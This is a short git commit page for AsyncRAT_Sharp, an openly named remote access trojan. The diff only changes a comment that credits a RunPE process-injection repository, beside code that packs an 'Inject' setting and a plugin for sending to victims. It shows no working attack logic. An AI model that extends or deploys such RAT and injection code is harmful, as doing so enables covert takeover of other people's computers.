Update runPE
This commit is contained in:
parent
cd19887e85
commit
4c90f1b85b
@ -499,7 +499,7 @@ namespace AsyncRAT_Sharp
|
|||||||
{
|
{
|
||||||
msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
|
msgpack.ForcePathObject("Inject").AsString = formSend.comboBox2.Text;
|
||||||
msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.Plugin);
|
msgpack.ForcePathObject("Plugin").SetAsBytes(Properties.Resources.Plugin);
|
||||||
// github.com/gigajew/WinXRunPE-x86_x64
|
// github.com/Artiist/RunPE-Process-Protection
|
||||||
}
|
}
|
||||||
|
|
||||||
foreach (ListViewItem itm in listView1.SelectedItems)
|
foreach (ListViewItem itm in listView1.SelectedItems)
|
||||||
|
Binary file not shown.
Loading…
x
Reference in New Issue
Block a user